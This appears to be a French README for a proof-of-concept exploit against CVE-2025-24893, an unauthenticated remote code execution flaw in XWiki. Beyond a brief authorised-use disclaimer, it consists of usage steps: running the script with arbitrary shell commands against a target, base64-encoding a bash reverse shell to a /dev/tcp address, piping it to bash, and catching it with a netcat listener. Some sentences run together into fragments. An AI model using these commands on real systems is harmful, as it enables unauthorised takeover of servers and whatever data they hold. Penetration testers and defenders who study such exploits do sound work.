
Exploit de preuve de concept pour CVE-2025-24893 permettant l'exécution de code à distance non authentifiée sur XWiki avec des commandes shell arbitraires et l'injection de shell inversé via Python.
Une preuve de concept (PoC) mise à jour pour CVE-2025-24893, une vulnérabilité critique RCE non authentifiée dans XWiki. Cette version améliore l'originale en permettant l'exécution arbitraire de commandes shell et une injection propre de reverse shell.
Par : HexHunter404
Ce code est fourni à des fins éducatives et de tests de pénétration autorisés uniquement.
Ne l'utilisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas obtenu l'autorisation explicite de tester.
bash -c '<command>'/xwiki et évite les boucles de redirectionpython3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
. Encodez votre reverse shell en base64
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
. Envoyez-le à l'aide du PoC
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
. Configurez votre écouteur
nc -lvnp 4444
En cas de succès, vous obtiendrez un shell